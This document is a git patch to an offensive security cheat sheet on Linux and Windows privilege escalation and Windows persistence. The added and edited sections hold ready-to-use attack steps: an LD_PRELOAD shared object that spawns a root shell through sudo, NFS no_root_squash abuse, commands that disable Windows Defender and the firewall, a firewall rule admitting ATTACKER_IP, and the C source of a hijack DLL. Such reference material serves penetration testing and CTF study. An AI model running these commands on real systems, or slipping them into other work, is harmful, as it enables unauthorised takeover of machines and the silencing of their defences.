From fb76fdc3312a5581493330c03915b70b8382b60d Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 1 Feb 2020 22:12:36 +0100 Subject: [PATCH] Windows Firewall + DLL hijacking + Named pipes --- .../Linux - Privilege Escalation.md | 97 ++++++++++--------- .../Windows - Persistence.md | 20 ++++ .../Windows - Privilege Escalation.md | 31 +++++- 3 files changed, 102 insertions(+), 46 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index ace5ec4..e11bcee 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -1,5 +1,49 @@ # Linux - Privilege Escalation +## Summary + +* [Tools](#tools) +* [Checklist](#checklists) +* [Looting for passwords](#looting-for-passwords) + * [Files containing passwords](#files-containing-passwords) + * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd) + * [Last edited files](#last-edited-files) + * [In memory passwords](#in-memory-passwords) + * [Find sensitive files](#find-sensitive-files) +* [Scheduled tasks](#scheduled-tasks) + * [Cron jobs](#cron-jobs) + * [Systemd timers](#systemd-timers) +* [SUID](#suid) + * [Find SUID binaries](#find-suid-binaries) + * [Create a SUID binary](#create-a-suid-binary) +* [Capabilities](#capabilities) + * [List capabilities of binaries](#list-capabilities-of-binaries) + * [Edit capabilities](#edit-capabilities) + * [Interesting capabilities](#interesting-capabilities) +* [SUDO](#sudo) + * [NOPASSWD](#nopasswd) + * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd) + * [Doas](#doas) + * [sudo_inject](#sudo-inject) +* [GTFOBins](#gtfobins) +* [Wildcard](#wildcard) +* [Writable files](#writable-files) + * [Writable /etc/passwd](#writable-etcpasswd) + * [Writable /etc/sudoers](#writable-etcsudoers) +* [NFS Root Squashing](#nfs-root-squashing) +* [Shared Library](#shared-library) + * [ldconfig](#ldconfig) + * [RPATH](#rpath) +* [Groups](#groups) + * [Docker](#docker) + * [LXC/LXD](#lxclxd) +* [Kernel Exploits](#kernel-exploits) + * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow) + * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds) + * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson) + * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper) + + ## Tools - [LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs](https://github.com/diego-treitos/linux-smart-enumeration) @@ -22,47 +66,6 @@ - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) - [Privilege Escalation through sudo - Linux](https://github.com/TH3xACE/SUDO_KILLER) -## Summary - -* [Checklist](#checklists) -* [Looting for passwords](#looting-for-passwords) - * [Files containing passwords](#files-containing-passwords) - * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd) - * [Last edited files](#last-edited-files) - * [In memory passwords](#in-memory-passwords) - * [Find sensitive files](#find-sensitive-files) -* [Scheduled tasks](#scheduled-tasks) - * [Cron jobs](#cron-jobs) - * [Systemd timers](#systemd-timers) -* [SUID](#suid) - * [Find SUID binaries](#find-suid-binaries) - * [Create a SUID binary](#create-a-suid-binary) -* [Capabilities](#capabilities) - * [List capabilities of binaries](#list-capabilities-of-binaries) - * [Edit capabilities](#edit-capabilities) - * [Interesting capabilities](#interesting-capabilities) -* [SUDO](#sudo) - * [NOPASSWD](#nopasswd) - * [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd) - * [Doas](#doas) - * [sudo_inject](#sudo-inject) -* [GTFOBins](#gtfobins) -* [Wildcard](#wildcard) -* [Writable files](#writable-files) - * [Writable /etc/passwd](#writable-etcpasswd) - * [Writable /etc/sudoers](#writable-etcsudoers) -* [NFS Root Squashing](#nfs-root-squashing) -* [Shared Library](#shared-library) - * [ldconfig](#ldconfig) - * [RPATH](#rpath) -* [Groups](#groups) - * [Docker](#docker) - * [LXC/LXD](#lxclxd) -* [Kernel Exploits](#kernel-exploits) - * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow) - * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds) - * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson) - * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper) ## Checklists @@ -356,7 +359,7 @@ If `LD_PRELOAD` is explicitly defined in the sudoers file Defaults env_keep += LD_PRELOAD ``` -Compile the following C code with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles` +Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles` ```powershell #include @@ -370,7 +373,7 @@ void _init() { } ``` -Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=/tmp/shell.so find` +Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD= `, e.g: `sudo LD_PRELOAD=/tmp/shell.so find` ### Doas @@ -478,14 +481,17 @@ echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers ## NFS Root Squashing -When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it +When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it. ```powershell +# remote check the name of the folder +showmount -e 10.10.10.10 + # create dir mkdir /tmp/nfsdir # mount directory -mount -t nfs 10.10.10.10:/shared /tmp/nfsdir +mount -t nfs 10.10.10.10:/shared /tmp/nfsdir cd /tmp/nfsdir # copy wanted shell @@ -690,3 +696,4 @@ https://www.exploit-db.com/exploits/18411 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 69986f5..f72f90c 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -3,6 +3,8 @@ ## Summary * [Tools](#tools) +* [Disable Windows Defender](#disable-windows-defender) +* [Disable Windows Firewall](#disable-windows-firewall) * [Userland](#userland) * [Registry](#registry) * [Startup](#startup) @@ -19,6 +21,24 @@ - [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist) +## Disable Windows Defender + +```powershell +sc config WinDefend start= disabled +sc stop WinDefend +Set-MpPreference -DisableRealtimeMonitoring $true +``` + +## Disable Windows Firewall + +```powershell +Netsh Advfirewall show allprofiles +NetSh Advfirewall set allprofiles state off + +# ip whitelisting +New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP +``` + ## Userland Set a file as hidden diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 955e79f..c863c8b 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -20,6 +20,7 @@ * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) * [EoP - Unquoted Service Paths](#eop---unquoted-service-paths) +* [EoP - Named Pipes](#eop---named-pipes) * [EoP - Kernel Exploitation](#eop---kernel-exploitation) * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) @@ -470,6 +471,26 @@ dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" Often, services are pointing to writeable locations: - Orphaned installs, not installed anymore but still exist in startup - DLL Hijacking + ```powershell + # find missing DLL + - Find-PathDLLHijack PowerUp.ps1 + - Process Monitor : check for "Name Not Found" + + # compile a malicious dll + - For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll" + - For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll" + + # content of windows_dll.c + #include + BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { + if (dwReason == DLL_PROCESS_ATTACH) { + system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt"); + ExitProcess(0); + } + return TRUE; + } + ``` + - PATH directories with weak permissions ```powershell @@ -605,6 +626,13 @@ For `C:\Program Files\something\legit.exe`, Windows will try the following paths - `C:\Program.exe` - `C:\Program Files.exe` +## EoP - Named Pipes + +1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")` +2. Check named pipes DACL: `pipesec.exe ` +3. Reverse engineering software +4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe` + ## EoP - Kernel Exploitation @@ -949,4 +977,5 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) * [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) -* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) \ No newline at end of file +* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) \ No newline at end of file